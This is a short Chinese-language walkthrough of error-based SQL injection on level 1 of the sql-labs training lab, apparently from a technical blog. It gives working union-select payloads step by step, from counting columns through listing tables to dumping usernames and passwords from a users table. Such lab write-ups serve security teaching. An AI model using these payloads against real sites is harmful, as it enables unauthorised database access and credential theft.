顯錯注入

SQL注入漏洞是Web層面最高危的漏洞之一,經過將惡意的SQL查詢或添加語句插入到應用的輸入參數中,再在後臺SQL服務器上解析執行進行的攻擊。
一下直接用sql-labs第一關演示
1.題目讓咱們請求一個id參數,以下
2.咱們輸入一個單引號,顯示報錯,以下
 
3.因此練習咱們去看一下他的源代碼,以下
4.咱們發現變量id在獲取後直接代入sql語句查詢,由此咱們能夠構造出payload猜字段長,二分法可得:?id=-1' order by 3--+
5.知道字段長後,爆回顯點:?id=-1' union select 1,2,3--+ 獲得回顯點在2,3
6.爆數據庫:?id=-1' union select 1,database(),3--+ 獲得數據庫爲security
7.爆出數據表並所有列出:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 咱們獲得該數據庫如下表,獲得users的用戶表
8.而後咱們繼續爆字段名:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
9.咱們看到了username和password的列,繼續爆出:?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
10.0x3a主要是爲了將username和password分割開 能夠不加,主要是爲了區分。
相關文章
相關標籤/搜索